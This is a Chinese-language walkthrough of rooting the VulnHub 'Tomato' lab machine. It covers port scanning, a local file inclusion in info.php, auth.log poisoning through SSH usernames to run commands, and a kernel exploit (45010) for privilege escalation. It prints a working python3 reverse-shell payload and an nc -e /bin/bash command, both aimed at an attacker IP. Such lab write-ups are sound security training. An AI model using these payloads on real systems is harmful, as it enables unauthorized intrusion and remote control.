靶机：

https://download.vulnhub.com/tomato/Tomato.ova

难度：

• 低

目标：

• 获得 Root 权限 +Flag

攻击方法：

• 主机发现
• 端口扫描
• 信息收集
• 路径爬取
• 源码分析
• 文件包含
• 写入日志 /var/log/auth.log
• 内核漏洞枚举 les.sh
• 本地提权

主机发现

sudo arp-scan -l

端口扫描和服务发现

nmap -p- 192.168.31.23

nmap -p21,80,2211,8888 -sV 192.168.31.23

-sV：这个选项表示进行版本探测。Nmap 将尝试确定在指定端口上运行的服务的版本信息，以便于用户了解所使用的软件版本。

发现它把 SSH 服务的端口从 22 改成 2211 了

sudo nmap -p21 -sC 192.168.31.23

-sC：这个选项表示启用 Nmap 的默认脚本引擎（Nmap Scripting Engine, NSE），执行与目标服务相关的默认脚本。这些脚本可以帮助获取更详细的信息和执行一些基本的安全检查。

发现没有可以用匿名 FTP 的方式

sudo nmap -p80 -sC 192.168.31.23

80 端口上跟漏洞相关的信息也没有，剩下的两个端口上面也没有

浏览器直接访问Web页面，发现是一个番茄

Ctrl + U 查看源码也没有发现任何有价值的信息

访问 8888 端口发现需要账号密码，尝试了几个弱口令之后失败了，用字典暴力破解也不行

路径爬取

sudo dirb "http://192.168.31.28/"

发现一个路径：/antibot_image/

在里面发现一个 info.php，里面有很多配置信息

Ctrl + U 查看源码，发现一行注释

文件包含

</?php include $_GET['image']; 

这里存在一个文件包含的漏洞

这段代码存在严重的安全风险，被称为“文件包含漏洞”。如果没有对 $_GET['image'] 的输入进行严格的验证和清理，攻击者可以通过构造恶意 URL 来包含服务器上的任意文件，例如：

• 本地文件包含（LFI）：攻击者可以尝试包含系统文件，如 /etc/passwd 等，获取敏感信息。
• 远程文件包含（RFI）：如果允许远程文件包含，攻击者可以通过 URL 远程加载恶意文件，进行代码执行或其他攻击。

那我们 GET 传参尝试进行本地文件包含，发现成功读取到了 /etc/passwd 文件的信息

http://192.168.31.28/antibot_image/antibots/info.php?image=/etc/passwd

尝试读取日志文件 /var/log/auth.log

/var/log/auth.log 是一个在许多基于 Linux 的操作系统中使用的日志文件，主要用于记录与系统认证和授权相关的事件。

auth.log 文件记录了与用户认证、登录尝试、sudo 命令的使用、身份验证失败等相关的信息。常见的内容包括：

• 成功和失败的登录尝试（例如 SSH 登录）。
• 使用 sudo 命令的记录，包括执行的命令和用户。
• PAM（可插拔认证模块）相关的信息。
• 系统服务（如 SSH 登录）启动和停止的信息。
• 其他与用户权限和安全相关的事件。

view-source:http://192.168.31.28/antibot_image/antibots/info.php?image=/var/log/auth.log

那我们尝试 ssh 登录试试，日志是否会出现在这里面

ssh aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa@192.168.31.28 -p 2211

再次读取 auth.log 日志文件即可发现确实是有记录产生在这里

那么我们就可以直接写一个 php 的一句话木马过去

但是命令行这个一直失败，提示 remote username contains invalid characters，？？？why？为啥别人都可以，难道是我的 ssh 版本太高了导致的？啊啊啊啊啊啊啊啊啊啊啊啊啊！

two hours late..................................

那就用工具（MobaXterm1_CHS1）来连接它终于成功了

?image=/var/log/auth.log&cmd=id

看一下 id 命令执行没有，发现执行了

反弹shell

?image=/var/log/auth.log&cmd=which nc

看一下发现有 nc 这个工具，用 nc 来反弹 shell 发现靶机的 nc 没有 -e 参数，反弹不了

?image=/var/log/auth.log&cmd=nc -e /bin/bash 192.168.31.132 4444

view-source:http://192.168.31.32/antibot_image/antibots/info.php?image=/var/log/auth.log&cmd=which%20python3

但是有 python3，那我们就用 python3 来反弹shell

在这个网站（https://forum.ywhack.com/shell.php）里有反弹 shell 大全，找一个来用

view-source:http://192.168.31.32/antibot_image/antibots/info.php?image=/var/log/auth.log&cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.31.136%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27

传参之后成功反弹shell（记得把 python 改成 python3）(>_<)

按照惯例升级一下shell，python3 -c "import pty;pty.spawn('/bin/bash')"

提权

先信息收集 uname -a，发现内核是 4.4.0-21-generic

用到 linux-exploit-suggester 工具

重命名一下成 les.sh

放到目标靶机上运行一下这个脚本

靶机先启动 nc 侦听接收文件 nc -lvnp 5555 > les.sh

本机 kali 传文件 nc 192.168.31.32 5555 < les.sh -w 1

传过去之后赋予执行权限，然后运行脚本

发现第二个 exp 可以成功利用，Exposur 是 highly probable 极有可能的，然后编号是 45010

searchsploit 45010 搜索找到 45010.c

先搞到当前目录先，按理说最好到靶机上再编译这个 C 脚本，但是目标靶机上没有安装 GCC

那我们只能在我们的 kali 上面编译好了之后再传过去

靶机接收之后运行但是报错了，这个错误提示意味着你的Docker容器中缺少GLIBC_2.34版本的依赖库

GLIBC（GNU C Library）是Linux系统上最常用的C库之一，它提供了许多基本的系统函数和工具。它是Linux系统与应用程序之间的接口，用于提供操作系统级别的功能和服务。

遇到的错误信息表明您尝试运行的程序 exp 需要特定版本的 GNU C 库（glibc），即 GLIBC_2.34，但在您的系统上未找到该版本。这通常意味着您的操作系统中安装的 glibc 版本较旧。

意思就是我 kali 的 GCC 版本太高了呗，不适配它靶机

那我只能再搞一台虚拟机来了，用这台虚拟机生成的 exp 再传过去给靶机执行

下一台与靶机环境相同或相似的环境

在该环境下编译，把编译好的exp上传靶机

在靶机上赋权，执行，得到root权限

奶奶滴！我直接起一个Ubuntu16：04的 docker 容器好嘞

把 docker 容器里的文件复制出来

nc 传过去

打靶完毕！

获得flag